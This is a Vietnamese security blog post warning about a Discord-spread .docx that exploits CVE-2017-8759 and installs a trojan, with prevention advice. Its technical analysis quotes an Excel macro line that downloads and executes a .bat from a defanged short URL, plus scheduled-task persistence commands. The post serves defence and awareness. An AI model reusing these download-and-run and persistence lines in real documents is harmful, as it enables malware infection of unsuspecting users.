Back to blog
Part of Cybersecurity Alerts series

Chuỗi Tấn Công Từ File .DOCX Dẫn Đến Trojan Qua Macro Excel & Script BAT

Một file .docx độc hại đang được lan truyền qua Discord, lợi dụng chuỗi khai thác và kỹ thuật che giấu phức tạp để cài đặt trojan (Hesive.b). Cuộc tấn công đặc biệt nguy hiểm trên hệ điều hành cũ như Windows 7.

June 30, 2025
3 min read
By Leo Pham
hackingdocx
Share this post:

🚨 Cảnh Báo: Chuỗi Tấn Công Từ File .DOCX Dẫn Đến Trojan Qua Macro Excel & Script BAT

⚠️ Cảnh báo:

Một file .docx độc hại đang được lan truyền qua Discord, lợi dụng chuỗi khai thác và kỹ thuật che giấu phức tạp để cài đặt trojan (Hesive.b). Cuộc tấn công đặc biệt nguy hiểm trên hệ điều hành cũ như Windows 7.

📋 Tổng Quan

Một người bạn trên Discord đã vô tình mở một file .docx có chứa mã độc. File này kích hoạt lỗ hổng CVE-2017-8759, sau đó tải về file .bat để tiếp tục tải và thực thi một file .exe trojan. Mã độc sử dụng macro trong Excel và Task Scheduler để tồn tại lâu dài và tránh bị phát hiện.

🎯 Chi Tiết Cuộc Tấn Công

  • Mục tiêu: Người dùng Windows (đặc biệt là Windows 7), người dùng Discord

  • Phương thức: .docx độc hại → tải file .RTF → khai thác CVE-2017-8759 → chạy macro Excel → tải .bat → thực thi trojan .exe

  • Tác hại: Mất quyền kiểm soát hệ thống, tồn tại lâu dài, tránh được phần mềm bảo mật

🔍 Phân Tích Kỹ Thuật

1. 🚀 Vector Tấn Công

Chuỗi tấn công hoạt động như sau:

  • Nạn nhân mở file .docx

  • File tự động tải về một template .dot

  • Trong .dot chứa macro VBA autoopen, thực hiện:

    • Mở Excel với chế độ tự động:

      cmd
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding

    • Thêm macro sử dụng các hàm nguy hiểm như:

      vb
=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://cutt[.]ly/Qkpgk8n","C:\PROGRAMDATA\a.bat",0,0) =EXEC("C:\PROGRAMDATA\a.bat")

  • File .bat kiểm tra phiên bản Windows và:

    • Tắt bảo vệ của Windows Defender

    • Tải và chạy file tt.exe

    • Tạo scheduled task:

      cmd
schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I

  • File trojan .exe chạy lệnh:

    cmd
schtasks.exe /Create /TN "Updates\qiQKAAFUEJeD" /XML "C:\Users\admin\AppData\Local\Temp\tmp28.tmp"

  • Gói tin mạng cho thấy DNS trỏ về máy chủ tại Việt Nam → Xác nhận là trojan

2. 💥 Đánh Giá Mức Độ Ảnh Hưởng

🚨 Nguy hiểm:

Mã độc có khả năng lẩn tránh, tự duy trì, và điều khiển máy nạn nhân từ xa.

  • 📁 Mất dữ liệu: Có thể đánh cắp thông tin nhạy cảm, tài liệu quan trọng

  • 🖥️ Mất quyền kiểm soát: Ghi đè lên registry, tồn tại lâu dài qua scheduled task

  • 💸 Thiệt hại tài chính: Có thể dùng để cài ransomware, keylogger, chiếm đoạt tài khoản

🛡️ Biện Pháp Phòng Chống

Danh Sách Việc Cần Làm:

  • Nâng cấp từ Windows 7 lên Windows 10 hoặc 11

  • Cập nhật bản vá bảo mật mới nhất (CVE-2017-8759 đã được vá từ 2017)

  • Không tắt Windows Defender

  • Cài thêm phần mềm diệt virus (Khuyên dùng: Malwarebytes)

  • Không mở file .docx từ nguồn không đáng tin

  • Cấu hình Office để tắt macro mặc định

  • Theo dõi các scheduled task đáng ngờ

  • Đào tạo nhân viên về rủi ro từ tài liệu văn phòng độc hại

📊 Bảng Tóm Tắt

Yếu Tố

Chi Tiết

Mức Độ Nguy Hiểm

Cao

Hệ Thống Bị Ảnh Hưởng

Windows 7, Office có macro

Thời Gian

Đang diễn ra – Lây qua Discord

Bản vá đã có chưa?

– Microsoft đã vá lỗi từ năm 2017

💡 Gợi Ý Từ Chuyên Gia:

Sử dụng Group Policy để chặn macro trừ khi được ký số, đồng thời bật PowerShell Constrained Language Mode để hạn chế khả năng bị khai thác.

Giữ an toàn, luôn cập nhật hệ thống và đừng tin bất kỳ file văn phòng nào nếu bạn không chắc chắn về nguồn gốc! 🔒

Last updated: June 30, 2025

Comments